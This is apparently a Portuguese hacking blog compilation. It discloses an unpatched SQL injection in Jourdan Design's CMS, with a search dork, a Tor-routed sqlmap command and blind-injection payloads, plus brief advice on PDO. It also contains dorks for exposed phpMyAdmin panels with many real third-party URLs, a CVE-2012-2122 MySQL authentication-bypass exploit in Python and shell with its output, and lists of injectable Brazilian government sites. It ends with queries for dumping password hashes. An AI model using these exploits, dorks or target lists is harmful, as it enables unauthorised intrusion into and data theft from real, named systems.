( 0day ) - CMS Jourdan Design - SQL INJECTION

Bom continua minhas pesquisas com ( CMS's ) brasileiros, esbarrei nas minhas "Googladas" com o CMS da empresa Jourdan Design.
Que o mesmo apresenta falhas graves de injeção SQL, via request POST & GET.
Como não achei código fonte, ou padrão de outros cms's deduzi que eles usam uma aplicação priv8.

Vamos aos fatos....
Em uma pequena e rápida analise é possível constatar MÚLTIPLAS VULNERABILIDADES:

INFORMAÇÕES:

[+] FORNECEDOR:            http://www.jourdandesign.com.br
[+] VERSÕES VULNERÁVEIS:   (NÃO IDENTIFICADO)
[+] ARQUIVO:               VIA POST: newsletter_done.php, pesquisa_done.php
                           VIA GET : nossa_historia_texto.php
[+] DORK:                  "by Jourdan Design" "news_not_pk"
[+] REPORTADO:             30/09/2015

Senhoras e Senhores que estão lendo esse humilde artigo, não quero falar que isso é uma falha grande
E que vai afetar milhões de pessoas ... pois não vai, essa "plataforma" ou emaranhado de códigos
não filtrados afeta no máximo seus usuários/clientes, mas o grande intuito é mostrar filtros com PDO..
e filtros desprotegidos e algumas boas condutas.

( Todo desenv sabe || deveria saber ) que sistemas quando vão para produção tem que está como seus erros tratados, pelo menos deveriam certo (?!).
Quase toda aplicação que é invadida via SQL - INJECTION é devido seus erros não tratados no server side, muitas vezes são ownadas por 'BOTS', sim bots. que ao identificar esse erro de Syntax SQL já começa injetar comandos par extração de informações.

MAS SÓ TRATAR OS ERROS DA MINHA APLICAÇÃO JÁ ME DEIXA SEGURO ?
A resposta é NÃO!

Apesar de ser informações básicas tanto pequenas quanto grande empresas incluindo governos ainda sofrem com isso.

Vamos aos BUGS da Jourdandesign
Demonstrarei somente um.

ARQUIVO:
newsletter_done.php
REQUEST POST:
nome=bypass&[email protected]&Submit3=cadastrar

POC:
http://www.vul.com.br/newsletter_done.php?nome=bypass+{SQL_INJECTION_BLIND}&[email protected]+{SQL_INJECTION_BLIND}&Submit3=cadastrar


GERANDO ERRO PASSANDO CARACTERES MALICIOSOS

ERRO EXPOSTO:

Pelos campos passados podemos perceber que tais parâmetros fazem parte da newsletter do "CMS", mas manipulando tais valores, saindo da validação javascript podemos bypassar.
Dica: sempre validar dados no lado servidor, seja ele vindo de clientes logados ou não.
          Se o request é feito pelo usurário, não confie no Request filtre.

EXPLORAÇÃO VIA SQLMAP:
COMANDO:
sqlmap -u 'http://www.vull.com.br/newsletter_done.php' --data "nome=bypass&email=123#2*@aduneb.com.br#1*&Submit3=cadastrar" -p nome --random-agent --level 3 --risk 2  --tor --tor-type=SOCKS5 --dbs --thread 5

PRINT:

RETURN SQLMAP DEBUG PAYLOAD:

Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: nome=bypass&email=-7840') OR 1946=1946#@aduneb.com.br#1&Submit3=cadastrar

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: nome=bypass&email=123#2') AND (SELECT * FROM (SELECT(SLEEP(10)))Vxmq)#@aduneb.com.br#1&Submit3=cadastrar

Parameter: #2* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: nome=bypass&email=-1051') OR 5045=5045#&Submit3=cadastrar

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: nome=bypass&email=123#[email protected]#1') AND (SELECT * FROM (SELECT(SLEEP(10)))tdlq)#&Submit3=cadastrar


CÓDIGO:
Um exemplo de como pode está o código do arquivo newsletter_done.php

<?php

$servername = "localhost";
$username = "username";
$password = "password";
$dbname = "myDB";

$nome  = $_POST['nome'];
$email = $_POST['email'];

// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);

// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
} 

$sql = "INSERT INTO newsletter (nome, email)
VALUES ('{$nome}', '{$email}')";

if ($conn->query($sql) === TRUE) {
    echo "EMAIL CADASTRADO COM SUCESSO!";
} else {
    echo "Error: " . $sql . "<br>" . $conn->error;
}

$conn->close();

?>

Sem  nem um tipo de filtro no request POST os valores são  setados direto nas variáveis da aplicação.

NÃO FAÇA ISSO NUNCA!

1. USE PDO!
2. PDO É VIDA CARA!
3. USE FILTROS!
4. ISSO SALVA VIDAS!

Um simples exemplo usando PDO e filtros:

CÓDIGO:

<?php

$servername = "localhost";
$username = "username";
$password = "password";
$dbname = "myDB";

// VALIDANDO $_POST SE CAMPOS EXISTEM

$nome = is_set($_POST['nome'])   ? $_POST['nome'] : exit('<p>FALTA campo nome!</p>');

$email = is_set($_POST['email']) ? $_POST['email'] : exit('<p>FALTA campo email!</p>');

// FILTRANDO CAMPOS POST

$nome =  is_name($nome)   ? $nome  : exit('<p>NOME invalido!</p>');

$email = is_email($email) ? $email : exit('<p>Email invalido!</p>');

// INICIANDO CONEXÃO

try {
$dbh = new PDO("mysql:host={$servername};dbname={$dbname}",$username,$password);

$stmt=$dbh->prepare("INSERT INTO newsletter (nome, email) VALUES (:nome, :email)");

$stmt->bindParam(':nome' , $nome);
$stmt->bindParam(':email', $email);
$stmt->execute();

$dbh = null;

} catch (PDOException $e) {
    print "<p>Error!: SQL/INSERT - 0001</p>";
    die();
}

// REF CÓDIGO: 

// http://php.net/manual/pt_BR/pdo.prepared-statements.php

// http://php.net/manual/en/pdo.prepare.php

//FUNCTION VALIDANDO SE VALORES PASSADOS EXISTEM

function is_set($value) {

    return isset($value) && !empty($value) ? TRUE : FALSE;
}

// REF CÓDIGO:

// http://php.net/manual/en/function.isset.php

// http://php.net/manual/en/function.empty.php

// FUNCTION FILTRANDO CARACTERES E VALIDANDO SE É EMAIL

function is_email($email){

// Remove all illegal characters from email
$email = filter_var($email, FILTER_SANITIZE_EMAIL);

// Validate e-mail
return (!filter_var($email, FILTER_VALIDATE_EMAIL) === false) ? true : false;

}

// REF CÓDIGO: 

// http://php.net/manual/en/filter.filters.sanitize.php 

// http://www.w3schools.com/php/filter_validate_email.asp

// http://bobby-tables.com/php.html 

// FUNCTION FILTRANDO E VALIDANDO NOME
// MODELO PARANOICO

function is_name($name) { 

// FILTRO POSSÍVEIS CARACTERES DE INJEÇÃO       
foreach (array('0X', 'DROP', ';','--','UNION','CONCAT(','TABLE_','INFORMATION_',"'",'"') as $value) {
$name = !strstr(strtoupper($name), $value) ? $name : FALSE;
            

}

// FILTRO POSSÍVEIS CARACTERES DE INJEÇÃO + HTML         
$name = (filter_var(stripslashes(strip_tags(trim($name))), FILTER_SANITIZE_STRING));
 return $name;
}

?>

É um pequeno código simples com mais segurança, seguindo as seguintes dicas:

• VALIDAR EXISTÊNCIA DO REQUEST
• FILTRAR CAMPOS
• USAR PDO EM TODA E QUALQUER SELECT,UPDATE,DELETE,INSERT
• - SE POSSÍVEL 
•        VALIDAR O TIPO DE VARIÁVEL
         VALIDAR TAMANHO MAXIMO CAMPOS / INPUT HTML
         VALIDAR TAMANHO MAXIMO CAMPOS / INPUT JAVASCRIPT
• ANTES DE GERAR O REQUEST DESNECESSÁRIO AO SERVIDOR
• REGRA PRINCIPAL NÃO CONFIE NO CLIENTE.

• ÚLTIMA REGRA
  SIGA TODAS REGRAS ACIMA.

Ferramenta Simple SQLi Dumper v5.1 - Tool

   Simple SQLi Dumper v5.1 - Tool 

Procura bugs,erros ou vulnerabilidades em aplicações que usem MySQL database.
Funções:

1. SQL Injection,
2. Operation System Function,
3. Dump Database,
4. Extract Database Schema,
5. Search Columns Name,
6. Read File (read only),
7. Create File (read only),
8. Brute Table & Column

Baixar:http://pastebin.com/ZGk5DKYa

Acessando banco de dados PHPMyAdmin sem validação

Acessando PHPMyAdmin sem validação

Resumo:

phpMyAdmin é um aplicativo web desenvolvido em PHP para administração do MySQL pela Internet. A partir deste sistema é possível criar e remover bases de dados, criar, remover e alterar tabelas, inserir, remover e editar campos, executar códigos SQL e manipular campos chaves. O phpMyAdmin é muito utilizado por programadores web que muitas vezes necessitam manipular bases de dados. Normalmente, o phpMyAdmin é tratado como uma ferramenta obrigatória em quase todas as hospedagens da web, além de pacotes off-line, como o WAMPServer, XAMPP, EasyPHP e PHP Triad.

 DORK's DE ACESSO:
 -------------------------------------------------------------------------------------------------------------------------------

inurl:"server_variables.php?token="
inurl:"/index.php?target=server_variables.php"
inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin"
inurl:"server_engines.php?token="
inurl:"server_sql.php?token="
inurl:"server_import.php?token="
inurl:"server_export.php?token="
inurl:"db_structure.php?db="
inurl:"main.php?token=" phpMyAdmin
inurl:"server_collations.php?token="

-------------------------------------------------------------------------------------------------------------------------------

Exemplo de acesso acesso:

As dorks elaboradas foram baseadas nas urls de acesso, para alguns não deve aprecer pois o painel usa um esquema com iframes com os seguintes menus-url's.

<li><a class="tab" href="server_databases.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_db.png" width="16" height="16" alt="Databases" />Databases</a></li>
<li><a class="tab" href="server_sql.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_sql.png" width="16" height="16" alt="SQL" />SQL</a></li>
<li><a class="tab" href="server_status.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_status.png" width="16" height="16" alt="Status" />Status</a></li>
<li><a class="tab" href="server_variables.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_vars.png" width="16" height="16" alt="Variables" />Variables</a></li>
<li><a class="tab" href="server_collations.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_asci.png" width="16" height="16" alt="Charsets" />Charsets</a></li>
<li><a class="tab" href="server_engines.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_engine.png" width="16" height="16" alt="Engines" />Engines</a></li>
<li><a class="tabactive" href="server_processlist.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_process.png" width="16" height="16" alt="Processes" />Processes</a></li> <li><a class="tab" href="server_export.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_export.png" width="16" height="16" alt="Export" />Export</a></li>
<li><a class="tab" href="server_import.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_import.png" width="16" height="16" alt="Import" />Import</a></li> </ul>

OBS: Algums serves não te daram acesso de imediato as tabelas, para isso use o executor de sql.
Usando SCANNER INURL para facilitar a busca.

Exemplo de comando:
php botConsole.php --host='www.google.com.br' --dork='inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin" -assembla' --arquivo='MYSQL.txt' --tipoerro='2' --exploit='' --achar='phpMyAdmin'

DEBUG:
----------------------------------------------------------------------------------------------------------------------------
0xHOST GOOGLE........: www.google.com.br
0xDORK...............: inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin" -assembla
0xEXPLOIT............:
0xARQUIVO............: MYSQL.txt
0xTIPO DE ERRO.......: 2
0xPROCURAR NO ALVO...: phpMyAdmin
0xIP PROXY...........:
0xPORTA..............:
----------------------------------------------------------------------------------------------------------------------------
0xCARREGANDO CONFIGURAÇÕES...
DEBUG:

Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => inurl%3A%22server_processlist.php%3F%22+intext%3A%22+SHOW+PROCESSLIST+%22+%26+intitle%3A%22phpMyAdmin%22+-assembla
    [arquivo] => MYSQL.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => phpMyAdmin
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=inurl%3A%22server_processlist.php%3F%22+intext%3A%22+SHOW+PROCESSLIST+%22+%26+intitle%3A%22phpMyAdmin%22+-assembla&num=1900&btnG=Search
    [port] => 80
)

[ BAIXAR: http://pastebin.com/TzijC99y  ] 

REF:
http://pt.wikipedia.org/wiki/PhpMyAdmin
http://www.phpmyadmin.net/


Resultados da pesquisa:

http://mech.sharif.ir/~web/phpmyadmin/server_processlist.php
http://www.zumrutcim.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&token=5ee6b4ef3eec67db200cffb4ca96bd97
www.zumrutcim.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&token=5ee6b4ef3eec67db200cffb4ca96bd97
http://www.nautilus.com.br/clientes/phpmyadmin_barcessat/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=f4e23698e63cb037f9ceb9eae1bd66da
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=0717590837c536a6b2fdf71b3e3dfb69&full=1&phpMyAdmin=qSVwBZtc8J68bUpNrdmHohiwvO6
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=629550b445dd53557edc873fea8256a7&full=1&phpMyAdmin=upcVaWZRbIqzaA7ZIn2NC7tcVXa
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=7850d21f77f5ff41c6a30d1468df949e&full=1&phpMyAdmin=5IeY%2C8tUFuMK6QBK-QvQoDVhkI0
http://contemar.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=25a89618f06d460b726bb902f261dc48
http://contemar.com/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=c0c6689d5bfd46016dfce6ad2e7dfc49
http://kalifaalmisnad.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d8f0843a76df17a88f489880a8a0fe86
http://webservice.jmasjuarez.gob.mx:8888/phpmyadmin/server_processlist.php?token=3b348ec6ff1b099c465f8ca203656538&full=1
https://www.der-insolvenzberater.de/phpMyAdmin/server_processlist.php?lang=en-utf-8&server=1&collation_connection=utf8_general_ci&kill=209505387
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=01395f779fcfe1160c96f9eb839860af&kill=15710
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3d4354e7a691623453b29361ea95be24&kill=17812
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61a9ec4af824fbf24b368f29ba2f36d3&kill=116759
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=ce58de690a926679d6b10589bb1b25a1&kill=15076
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=ae7332a9388dd4763b0f9195b67ce197&kill=148286
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1d847c6be291d8428d8c828af4fde151&kill=113261
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=be9a026238ab69f456c53337318599a3&kill=22662
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=161b1d193b0032814d65f117af4074cb&kill=12862
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3ba1c5db1b7c429310ca466d8a3a4f9a&kill=108535
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1de9baadfb04138dcc81eb84d4b45421&kill=11170
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1bd8be911d5ea86940f12a7e7bd314c7&kill=15121
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=6b7d94bc8ead69989a5029f85594ac28&kill=11628
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=615dee42fa4bb4f27dadb0fc5443a126&kill=14768
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=79d1803b895548651c481a7358109955&kill=171800
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=dde1ce380bf8aef5e540b98d03c71f82&kill=49081
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=5e5761963c4f8e162ef84d9c1314426b&kill=28424
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=fe769b489d3faa1af424d7f494a2fd7b&kill=5552
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=81809c221f69540df71746d8a4974216&kill=115784
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=7bd07acd4c06d737d445184c2daa9934&kill=154635
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3023cf534d907c3096a907c26f2b31df&kill=17227
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=28b024572f0f02fa5540619532cc448c&kill=12683
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61415fd5a6703bff296bd9a95b186a9c&kill=30052
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=87ad999dfd8e1e831ee4d8a7a4fdc6be&kill=4724
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=a5c70b6418a08d53b441f85aba7ab469&kill=16152
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=08c87f19ccbea81587423b4c7658a17e&kill=14637
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=b17527ee7093814acd79faef0ca0642a&kill=17173
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=15c68c757f728a341a8e670a6dec1f74&kill=12618
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d4b87d5771681e2677becd9cfa8cc42b&kill=730
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d52749f3c3fa8de4f3cb4c692ee27bc1&kill=15447
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=9c4973ed00c81fea82949e86074767da&kill=10851
http://royaltouchny.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=b64ac0249e08905103b6c694b46d209b
http://www.elektro-denker.com/phpMyAdmin-elebwbvm/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=6788654e634886ee9ca4ca18818a7f99&full=1
www.elektro-denker.com
www.elektro-denker.com/
http://202.137.230.154/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=04f7d18dd41feabf6f193ce98845d0e7
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=ef4ce41cc7bb19fa4216a8d1fd89b2a5&kill=84848
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=28e762b909008475fa0df0b505d9594d&kill=90009
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=d54040fd24f287358e5c83e51d41005a&kill=82080
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=dbff09ac97b69ce0b6647a1aed5b9424&kill=82182
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=03aa0d1eb55f9506a963c6b3f7222362&kill=88181
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=b83e7763a2d3035eadf0a3f6c5c20827&kill=80865
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=16599770
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=3127566
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=2344240
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=17134474
http://118.97.147.162/phpmyadmin/server_processlist.php?token=914db90734e2ffdf1ae593444fac693a
http://www.rocketys.net/server_processlist.php?token=6fe896b38b75bc846cefc533fa18b8b9
www.rocketys.net
www.rocketys.net/
http://made-in-dk.eu/phpMyAdmin-knoktfdu4/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=5a55615d2a73c3ee8e79741f1c27c637&kill=35563628
http://maxxyz.de/server_processlist.php?token=a863cfb68b631c080e3e289b75dfee9c
http://www.self.org.uk/server_processlist.php?token=5bfb8e5316455b364516652ae3fd34cb
www.self.org.uk
www.self.org.uk/
http://itarget.fr/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1a8151db903b7e9cf2a0ee3ea2815bd4
http://xellnaga.free.fr/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61023193d1a9303ab9c0a9fa397ef1cd
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=2711119
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=80890
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=500730
http://210.14.6.59/phpmyadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=3333&phpMyAdmin=73684aa4546609bf75358e6b1a9e6e91
http://210.14.6.59/phpmyadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=14037&phpMyAdmin=73684aa4546609bf75358e6b1a9e6e91

Conheça MySQL Authentication Bypass Exploit.

MySQL permite a autenticação de qualquer usuário válido (ou seja, root ativos em 99% das instalações) sem a necessidade de senha, utilizando apenas um simples LOOP  de tentativas exaustivo de conexões.

Todas as versões do MySQL e MariaDB até 5.1.61, 5.2.11, 5.3.5, 5.5.22 são vulnerável.
Versões de MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 não são.
Versões do MySQL 5.1.63 de, 5.5.24, 5.6.6 não são.

Esta questão foi atribuído um ID:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122

O que significa que, se alguém sabe um nome de usuário para se conectar (e "root" quase sempre existe), ela pode se conectar usando * qualquer senha * repetindo tentativas de conexão. ~ 300 tentativas leva apenas uma fração de segundo, então basicamente conta a proteção por senha é tão bom como inexistente.

Qualquer cliente vai fazer, não há necessidade de uma biblioteca libmysqlclient especial.

EXPLOIT CÓDIGO PYTHON:

#!/usr/bin/python
import subprocess

1. import subprocess
2.  
3. ipaddr = raw_input("Enter the IP address of the mysql server: ")
4.  
5. while 1:
6.     subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()

EXPLOIT CÓDIGO EM SHELLSCRIPT:

while true; do mysql -u root --password=senha -h 127.0.0.1 2>/dev/null; done


Executando comando exploit em python:

google@inurl:~# python mysql.py
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql>

Exploit:
PYTHON
http://pastebin.com/JuHZX7zJ
PHP
http://pastebin.com/CTYx2hUt

DORK buscar erros em sites de prefeituras

DORK: site:gov.br +(error) mysql (prefeitura) ext:asp -pdf

Resultados:

http://www3.prefeitura.sp.gov.br/cadlem/secretarias/negocios_juridicos/cadlem/integra.asp?%20alt=25042003P%20000352003SVMA%20%20%20%20%20%20%20%20&secr=87&depto=0&descr_tipo=PORTARIA


http://www.praiagrande.sp.gov.br/pgnoticias/noticias/noticia_01.asp?cod=14616'&cd_categoria=

http://smaonline.rio.rj.gov.br/sistemas/SCS/WPLTO/noticia_detalhada_free.asp?index=460'

http://www2.seplag.ce.gov.br/premio/projetos_filtro_detalhes_2011.asp?cdProjeto=262'



http://www.lajeado.rs.gov.br/download_anexo/index.asp?strARQUIVO=http://blog.inurl.com.br&strdescricao=%3Cdiv%20style=%22padding:50px;5px;0px;0px;%22%3E%3Cimg%20src=%22http://1.bp.blogspot.com/-UO00Uv2mkDU/UeWWrU1yRlI/AAAAAAAACik/RWAixxyctZ0/s1600/1062380_475164299242951_1939178094_n.jpg%22/%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C!--


http://www.portoalegre.rs.gov.br/noticias/ver_imprimir.asp?m1=21931'

http://www.carauari.am.gov.br/portal1/municipio/noticia.asp?iIdMun=100113017'&iIdNoticia=219764


http://www.proderj.rj.gov.br/artigo_completo.asp?ident=23'

http://www.praiagrande.sp.gov.br/Praiagrande/noticia_01.asp?cod=14616'&cd_categoria=

http://www.internetcomunitaria.rj.gov.br/detalhe_noticia.asp?ident=-31


http://ww1.saojoao.sp.gov.br/compras/locaweb_resultadoitens.asp?Modalidade=1&Numero=1068&Ano=2011&Fornecedor=3414&DscFornecedor=%3Cdiv%20style=%22padding:50px;5px;0px;0px;%22%3E%3Cimg%20src=%22http://1.bp.blogspot.com/-UO00Uv2mkDU/UeWWrU1yRlI/AAAAAAAACik/RWAixxyctZ0/s1600/1062380_475164299242951_1939178094_n.jpg%22/%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C!--&DscMod=COTA%C7%C3O%20DE%20SERVI%C7OS

Comandos MYSQL

Comandos MYSQL

Version	SELECT @@version
Comments	SELECT 1; #comment SELECT /*comment*/1;
Current User	SELECT user(); SELECT system_user();
List Users	SELECT user FROM mysql.user; — priv
List Password Hashes	SELECT host, user, password FROM mysql.user; — priv
Password Cracker	John the Ripper will crack MySQL password hashes.
